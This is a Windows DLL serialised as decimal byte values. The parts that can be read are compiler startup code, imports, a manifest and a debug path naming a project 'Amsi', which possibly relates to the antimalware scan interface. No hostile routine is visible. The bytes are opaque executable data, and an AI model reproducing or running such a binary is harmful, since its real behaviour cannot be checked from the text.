131 232 1 116 5 51 192 64 235 48 232 245 4 0 0 235 5 232 207 4 0 0 15 182 192 235 31 255 117 16 255 117 8 232 24 0 0 0 89 235 16 131 125 16 0 15 149 192 15 182 192 80 232 23 1 0 0 89 93 194 12 0 106 16 104 24 36 0 16 232 123 9 0 0 106 0 232 35 5 0 0 89 132 192 117 7 51 192 233 224 0 0 0 232 40 4 0 0 136 69 227 179 1 136 93 231 131 101 252 0 131 61 60 51 0 16 0 116 7 106 7 232 203 7 0 0 199 5 60 51 0 16 1 0 0 0 232 74 4 0 0 132 192 116 101 232 206 8 0 0 104 186 25 0 16 232 177 6 0 0 232 93 7 0 0 199 4 36 57 24 0 16 232 160 6 0 0 232 112 7 0 0 199 4 36 128 32 0 16 104 124 32 0 16 232 78 11 0 0 89 89 133 192 117 41 232 237 3 0 0 132 192 116 32 104 120 32 0 16 104 116 32 0 16 232 42 11 0 0 89 89 199 5 60 51 0 16 2 0 0 0 50 219 136 93 231 199 69 252 254 255 255 255 232 68 0 0 0 132 219 15 133 76 255 255 255 232 52 7 0 0 139 240 131 62 0 116 30 86 232 40 5 0 0 89 132 192 116 19 255 117 12 106 2 255 117 8 139 54 139 206 232 136 8 0 0 255 214 255 5 24 48 0 16 51 192 64 232 201 8 0 0 195 138 93 231 255 117 227 232 131 5 0 0 89 195 106 12 104 56 36 0 16 232 105 8 0 0 161 24 48 0 16 133 192 127 4 51 192 235 79 72 163 24 48 0 16 232 22 3 0 0 136 69 228 131 101 252 0 131 61 60 51 0 16 2 116 7 106 7 232 190 6 0 0 232 180 3 0 0 131 37 60 51 0 16 0 199 69 252 254 255 255 255 232 27 0 0 0 106 0 255 117 8 232 65 5 0 0 89 89 51 201 132 192 15 149 193 139 193 232 78 8 0 0 195 232 164 3 0 0 255 117 228 232 6 5 0 0 89 195 106 12 104 88 36 0 16 232 236 7 0 0 131 101 252 0 139 125 12 131 255 1 116 10 131 255 2 116 5 139 93 8 235 49 255 117 16 87 139 93 8 83 232 218 0 0 0 139 240 137 117 228 133 246 15 132 190 0 0 0 255 117 16 87 83 232 216 253 255 255 139 240 137 117 228 133 246 15 132 167 0 0 0 131 255 1 117 7 83 232 198 9 0 0 89 255 117 16 87 83 232 159 253 255 255 139 240 137 117 228 131 255 1 117 43 133 246 117 30 255 117 16 80 83 232 135 253 255 255 255 117 16 86 83 232 147 253 255 255 255 117 16 86 83 232 116 0 0 0 131 255 1 117 4 133 246 116 4 133 255 117 11 83 232 130 9 0 0 89 133 255 116 5 131 255 3 117 72 255 117 16 87 83 232 98 253 255 255 139 240 137 117 228 133 246 116 53 255 117 16 87 83 232 58 0 0 0 139 240 235 36 139 77 236 139 1 81 255 48 104 22 16 0 16 255 117 16 255 117 12 255 117 8 232 86 2 0 0 131 196 24 195 139 101 232 51 246 137 117 228 199 69 252 254 255 255 255 139 198 232 54 7 0 0 195 85 139 236 86 139 53 160 32 0 16 133 246 117 5 51 192 64 235 18 255 117 16 139 206 255 117 12 255 117 8 232 193 6 0 0 255 214 94 93 194 12 0 85 139 236 131 125 12 1 117 5 232 88 4 0 0 255 117 16 255 117 12 255 117 8 232 177 254 255 255 131 196 12 93 194 12 0 85 139 236 106 0 255 21 40 32 0 16 255 117 8 255 21 0 32 0 16 104 9 4 0 192 255 21 4 32 0 16 80 255 21 8 32 0 16 93 195 85 139 236 129 236 36 3 0 0 106 23 232 234 8 0 0 133 192 116 5 106 2 89 205 41 163 32 49 0 16 137 13 28 49 0 16 137 21 24 49 0 16 137 29 20 49 0 16 137 53 16 49 0 16 137 61 12 49 0 16 102 140 21 56 49 0 16 102 140 13 44 49 0 16 102 140 29 8 49 0 16 102 140 5 4 49 0 16 102 140 37 0 49 0 16 102 140 45 252 48 0 16 156 143 5 48 49 0 16 139 69 0 163 36 49 0 16 139 69 4 163 40 49 0 16 141 69 8 163 52 49 0 16 139 133 220 252 255 255 199 5 112 48 0 16 1 0 1 0 161 40 49 0 16 163 44 48 0 16 199 5 32 48 0 16 9 4 0 192 199 5 36 48 0 16 1 0 0 0 199 5 48 48 0 16 1 0 0 0 106 4 88 107 192 0 199 128 52 48 0 16 2 0 0 0 106 4 88 107 192 0 139 13 4 48 0 16 137 76 5 248 106 4 88 193 224 0 139 13 0 48 0 16 137 76 5 248 104 164 32 0 16 232 225 254 255 255 139 229 93 195 85 139 236 139 69 8 86 139 72 60 3 200 15 183 65 20 141 81 24 3 208 15 183 65 6 107 240 40 3 242 59 214 116 25 139 77 12 59 74 12 114 10 139 66 8 3 66 12 59 200 114 12 131 194 40 59 214 117 234 51 192 94 93 195 139 194 235 249 232 85 7 0 0 133 192 117 3 50 192 195 100 161 24 0 0 0 86 190 64 51 0 16 139 80 4 235 4 59 208 116 16 51 192 139 202 240 15 177 14 133 192 117 240 50 192 94 195 176 1 94 195 232 32 7 0 0 133 192 116 7 232 118 5 0 0 235 5 232 77 7 0 0 176 1 195 106 0 232 207 0 0 0 132 192 89 15 149 192 195 232 97 7 0 0 132 192 117 3 50 192 195 232 85 7 0 0 132 192 117 7 232 76 7 0 0 235 237 176 1 195 232 66 7 0 0 232 61 7 0 0 176 1 195 85 139 236 232 203 6 0 0 133 192 117 24 131 125 12 1 117 18 255 117 16 139 77 20 80 255 117 8 232 136 4 0 0 255 85 20 255 117 28 255 117 24 232 219 6 0 0 89 89 93 195 232 155 6 0 0 133 192 116 12 104 68 51 0 16 232 220 6 0 0 89 195 232 240 6 0 0 133 192 15 132 217 6 0 0 195 106 0 232 221 6 0 0 89 233 215 6 0 0 85 139 236 131 125 8 0 117 7 198 5 92 51 0 16 1 232 186 4 0 0 232 189 6 0 0 132 192 117 4 50 192 93 195 232 176 6 0 0 132 192 117 10 106 0 232 165 6 0 0 89 235 233 176 1 93 195 85 139 236 131 236 12 86 139 117 8 133 246 116 5 131 254 1 117 124 232 31 6 0 0 133 192 116 42 133 246 117 38 104 68 51 0 16 232 80 6 0 0 89 133 192 116 4 50 192 235 87 104 80 51 0 16 232 61 6 0 0 247 216 89 26 192 254 192 235 68 161 4 48 0 16 141 117 244 87 131 224 31 191 68 51 0 16 106 32 89 43 200 131 200 255 211 200 51 5 4 48 0 16 137 69 244 137 69 248 137 69 252 165 165 165 191 80 51 0 16 137 69 244 137 69 248 141 117 244 137 69 252 176 1 165 165 165 95 94 139 229 93 195 106 5 232 6 2 0 0 204 106 8 104 120 36 0 16 232 117 3 0 0 131 101 252 0 184 77 90 0 0 102 57 5 0 0 0 16 117 96 161 60 0 0 16 129 184 0 0 0 16 80 69 0 0 117 79 185 11 1 0 0 102 57 136 24 0 0 16 117 65 139 69 8 185 0 0 0 16 43 193 80 81 232 180 253 255 255 89 89 133 192 116 42 247 64 36 0 0 0 128 117 33 199 69 252 254 255 255 255 176 1 235 31 139 69 236 139 0 51 201 129 56 5 0 0 192 15 148 193 139 193 195 139 101 232 199 69 252 254 255 255 255 50 192 232 59 3 0 0 195 85 139 236 232 11 5 0 0 133 192 116 15 128 125 8 0 117 9 51 192 185 64 51 0 16 135 1 93 195 85 139 236 128 61 92 51 0 16 0 116 6 128 125 12 0 117 18 255 117 8 232 67 5 0 0 255 117 8 232 59 5 0 0 89 89 176 1 93 195 85 139 236 161 4 48 0 16 139 200 51 5 68 51 0 16 131 225 31 255 117 8 211 200 131 248 255 117 7 232 1 5 0 0 235 11 104 68 51 0 16 232 233 4 0 0 89 247 216 89 27 192 247 208 35 69 8 93 195 85 139 236 255 117 8 232 186 255 255 255 247 216 89 27 192 247 216 72 93 195 85 139 236 131 236 20 131 101 244 0 131 101 248 0 161 4 48 0 16 86 87 191 78 230 64 187 190 0 0 255 255 59 199 116 13 133 198 116 9 247 208 163 0 48 0 16 235 102 141 69 244 80 255 21 28 32 0 16 139 69 248 51 69 244 137 69 252 255 21 32 32 0 16 49 69 252 255 21 36 32 0 16 49 69 252 141 69 236 80 255 21 16 32 0 16 139 77 240 141 69 252 51 77 236 51 77 252 51 200 59 207 117 7 185 79 230 64 187 235 16 133 206 117 12 139 193 13 17 71 0 0 193 224 16 11 200 137 13 4 48 0 16 247 209 137 13 0 48 0 16 95 94 139 229 93 195 104 96 51 0 16 255 21 24 32 0 16 195 104 96 51 0 16 232 229 3 0 0 89 195 184 104 51 0 16 195 184 112 51 0 16 195 232 239 255 255 255 139 72 4 131 8 4 137 72 4 232 231 255 255 255 139 72 4 131 8 2 137 72 4 195 184 132 51 0 16 195 85 139 236 129 236 36 3 0 0 83 86 106 23 232 234 3 0 0 133 192 116 5 139 77 8 205 41 51 246 141 133 220 252 255 255 104 204 2 0 0 86 80 137 53 120 51 0 16 232 133 3 0 0 131 196 12 137 133 140 253 255 255 137 141 136 253 255 255 137 149 132 253 255 255 137 157 128 253 255 255 137 181 124 253 255 255 137 189 120 253 255 255 102 140 149 164 253 255 255 102 140 141 152 253 255 255 102 140 157 116 253 255 255 102 140 133 112 253 255 255 102 140 165 108 253 255 255 102 140 173 104 253 255 255 156 143 133 156 253 255 255 139 69 4 137 133 148 253 255 255 141 69 4 137 133 160 253 255 255 199 133 220 252 255 255 1 0 1 0 139 64 252 106 80 137 133 144 253 255 255 141 69 168 86 80 232 252 2 0 0 139 69 4 131 196 12 199 69 168 21 0 0 64 199 69 172 1 0 0 0 137 69 180 255 21 20 32 0 16 86 141 88 255 247 219 141 69 168 137 69 248 141 133 220 252 255 255 26 219 137 69 252 254 195 255 21 40 32 0 16 141 69 248 80 255 21 0 32 0 16 133 192 117 13 15 182 195 247 216 27 192 33 5 120 51 0 16 94 91 139 229 93 195 83 86 190 8 36 0 16 187 8 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 56 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 83 86 190 16 36 0 16 187 16 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 13 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 255 37 112 32 0 16 204 204 204 204 204 104 75 26 0 16 100 255 53 0 0 0 0 139 68 36 16 137 108 36 16 141 108 36 16 43 224 83 86 87 161 4 48 0 16 49 69 252 51 197 80 137 101 232 255 117 248 139 69 252 199 69 252 254 255 255 255 137 69 248 141 69 240 100 163 0 0 0 0 242 195 139 77 240 100 137 13 0 0 0 0 89 95 95 94 91 139 229 93 81 242 195 85 139 236 255 117 20 255 117 16 255 117 12 255 117 8 104 5 16 0 16 104 4 48 0 16 232 203 1 0 0 131 196 24 93 195 85 139 236 131 37 124 51 0 16 0 131 236 44 83 51 219 67 9 29 16 48 0 16 106 10 232 228 1 0 0 133 192 15 132 116 1 0 0 131 101 236 0 51 192 131 13 16 48 0 16 2 51 201 86 87 137 29 124 51 0 16 141 125 212 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 139 69 212 139 77 224 137 69 244 129 241 105 110 101 73 139 69 220 53 110 116 101 108 11 200 139 69 216 53 71 101 110 117 11 200 247 217 106 1 88 26 201 106 0 128 193 1 89 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 116 67 139 69 212 37 240 63 255 15 61 192 6 1 0 116 35 61 96 6 2 0 116 28 61 112 6 2 0 116 21 61 80 6 3 0 116 14 61 96 6 3 0 116 7 61 112 6 3 0 117 17 139 61 128 51 0 16 131 207 1 137 61 128 51 0 16 235 6 139 61 128 51 0 16 131 125 244 7 139 69 224 137 69 228 139 69 220 137 69 248 137 69 232 124 50 106 7 88 51 201 83 15 162 139 243 91 141 93 212 137 3 137 115 4 137 75 8 137 83 12 139 69 216 169 0 2 0 0 137 69 236 139 69 248 116 9 131 207 2 137 61 128 51 0 16 95 94 169 0 0 16 0 116 109 131 13 16 48 0 16 4 199 5 124 51 0 16 2 0 0 0 169 0 0 0 8 116 85 169 0 0 0 16 116 78 51 201 15 1 208 137 69 240 137 85 244 139 69 240 139 77 244 131 224 6 51 201 131 248 6 117 51 133 201 117 47 161 16 48 0 16 131 200 8 199 5 124 51 0 16 3 0 0 0 246 69 236 32 163 16 48 0 16 116 18 131 200 32 199 5 124 51 0 16 5 0 0 0 163 16 48 0 16 51 192 91 139 229 93 195 51 192 57 5 20 48 0 16 15 149 192 195 195 255 37 52 32 0 16 255 37 60 32 0 16 255 37 56 32 0 16 255 37 48 32 0 16 255 37 64 32 0 16 255 37 104 32 0 16 255 37 100 32 0 16 255 37 96 32 0 16 255 37 92 32 0 16 255 37 88 32 0 16 255 37 84 32 0 16 255 37 80 32 0 16 255 37 76 32 0 16 255 37 72 32 0 16 255 37 12 32 0 16 176 1 195 51 192 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 27 28 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 48 0 16 112 48 0 16 0 0 0 0 0 0 0 0 144 29 62 87 0 0 0 0 2 0 0 0 61 0 0 0 132 33 0 0 132 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 196 33 0 0 196 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 13 0 0 0 44 2 0 0 216 33 0 0 216 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 92 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 48 0 16 128 33 0 16 1 0 0 0 112 32 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 75 26 0 0 82 83 68 83 69 10 117 219 0 114 41 77 133 149 98 78 29 103 122 248 7 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 20 0 0 0 20 0 0 0 1 0 0 0 19 0 0 0 71 67 84 76 0 16 0 0 124 12 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 112 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 112 32 0 0 4 0 0 0 46 48 48 99 102 103 0 0 116 32 0 0 4 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 120 32 0 0 4 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 124 32 0 0 4 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 128 32 0 0 4 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 132 32 0 0 4 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 136 32 0 0 4 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 140 32 0 0 4 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 144 32 0 0 4 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 160 32 0 0 220 0 0 0 46 114 100 97 116 97 0 0 128 33 0 0 4 0 0 0 46 114 100 97 116 97 36 115 120 100 97 116 97 0 0 0 132 33 0 0 128 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 4 36 0 0 4 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 8 36 0 0 4 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 12 36 0 0 4 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 16 36 0 0 4 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 24 36 0 0 124 0 0 0 46 120 100 97 116 97 36 120 0 0 0 0 148 36 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 208 36 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 228 36 0 0 112 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 84 37 0 0 136 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 100 97 116 97 0 0 0 24 48 0 0 112 3 0 0 46 98 115 115 0 0 0 0 0 64 0 0 20 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 80 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 80 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 255 255 0 0 0 0 208 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 110 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 233 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 203 18 0 16 234 18 0 16 0 0 0 0 254 255 255 255 0 0 0 0 216 255 255 255 0 0 0 0 254 255 255 255 215 22 0 16 234 22 0 16 20 37 0 0 0 0 0 0 0 0 0 0 220 37 0 0 48 32 0 0 44 37 0 0 0 0 0 0 0 0 0 0 164 38 0 0 72 32 0 0 228 36 0 0 0 0 0 0 0 0 0 0 206 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 72 0 109 101 109 115 101 116 0 0 53 0 95 101 120 99 101 112 116 95 104 97 110 100 108 101 114 52 95 99 111 109 109 111 110 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 56 0 95 105 110 105 116 116 101 114 109 0 57 0 95 105 110 105 116 116 101 114 109 95 101 0 65 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 53 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 54 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 62 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 36 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 31 0 95 99 114 116 95 97 116 101 120 105 116 0 23 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 130 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 67 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 9 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 97 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 109 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 45 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 10 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 14 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 214 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 75 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 103 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 177 25 191 68 78 230 64 187 255 255 255 255 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 12 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 80 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 12 1 0 0 7 48 108 48 155 48 171 48 194 48 211 48 228 48 233 48 2 49 7 49 20 49 97 49 126 49 136 49 150 49 168 49 189 49 251 49 212 50 7 51 85 51 94 51 105 51 112 51 144 51 150 51 156 51 162 51 168 51 174 51 181 51 188 51 195 51 202 51 209 51 216 51 223 51 231 51 239 51 247 51 3 52 12 52 17 52 23 52 33 52 43 52 59 52 75 52 91 52 100 52 201 52 121 53 170 53 249 53 12 54 31 54 43 54 59 54 76 54 114 54 135 54 142 54 148 54 166 54 176 54 17 55 30 55 69 55 77 55 102 55 160 55 187 55 199 55 214 55 223 55 236 55 27 56 35 56 46 56 52 56 58 56 70 56 76 56 111 56 160 56 75 57 106 57 116 57 133 57 146 57 151 57 189 57 194 57 231 57 241 57 14 58 91 58 96 58 115 58 129 58 156 58 167 58 54 59 63 59 71 59 142 59 157 59 164 59 218 59 227 59 240 59 251 59 4 60 19 60 30 60 36 60 42 60 48 60 54 60 60 60 66 60 72 60 78 60 84 60 90 60 96 60 102 60 108 60 114 60 0 0 0 32 0 0 32 0 0 0 112 48 164 48 168 48 92 49 96 49 104 49 48 52 80 52 108 52 112 52 140 52 144 52 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 